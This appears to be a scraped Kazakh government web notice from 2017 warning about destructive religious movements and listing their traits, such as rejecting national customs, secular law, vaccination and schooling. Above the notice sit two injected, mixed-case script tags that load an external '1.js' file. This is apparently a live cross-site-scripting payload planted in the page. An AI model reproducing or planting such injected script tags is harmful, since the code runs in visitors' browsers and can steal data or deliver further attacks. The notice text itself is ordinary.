<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.06.2017

ДЕСТРУКТИВТІ ДІНИ АҒЫМДАРДАН

САҚ БОЛЫҢЫЗ!

Деструктивті діни ағымдар қоғамдық қауіпсіздікке, неке және отбасы институтына, адам

денсаулығына қатер төндіреді.

Олардың жақтастары:

-      Қазақстанда тұратын барлық этностардың ұлттық құндылықтары мен салт-дәстүрлерін (Наурыз мейрамын тойлауды, қазақ халқының «бет ашар», «сәлем салу» салттарын, өмірден озған жандарға Құран бағыштауды

және т.б.) жоққа шығарады;

-    зайырлы мемлекеттерге және зайырлы өмір сүру салтына қарсылық танытады;

-    мемлекеттік рәміздерді және мемлекеттік мерекелерді құрметтемейді;

-  мазхабтарды (Орталық Азияда және мұсылман әлемінің басқа да аймақтарында орныққан діни мектептерді), оның ішінде Қазақстанның көпшілік мұсылмандары ұстанатын ханафи мазхабын жоққа шығарады;

-    дәстүрлі исламды ұстанатын мұсылмандарды күпірлік жасайды да айыптайды, өзге діндердің

өкілдері мен дінді ұстанбайтын адамдарға төзімсіздік танытады;

-   заманауи мәдениет және өнер түрлеріне (музыка, балет, бейнелеу өнері және т.б.) өшпенділіктанытады;

-    заңда белгіленген міндеттерді (әскерде қызмет ету, міндетті орта білім алу және т.б.)орындаудан бас тартады;

-   медициналық рәсімдердің кейбір түрлерінен (қан құю, вакцинация, ағза мүшелерін трансплантациялау және т.б.) бас тартады;

-   білім мекемелеріндегі жекелеген пәндерге (биология, дене шынықтыру, ән-күй, сурет салу және т.б.) қатыспауға шақырады.

 

     

ҚР ДІАҚМ Дін істері комитеті

Просмотров: 1430


Пікір қосу



Деректерді қолтаңбаға қосу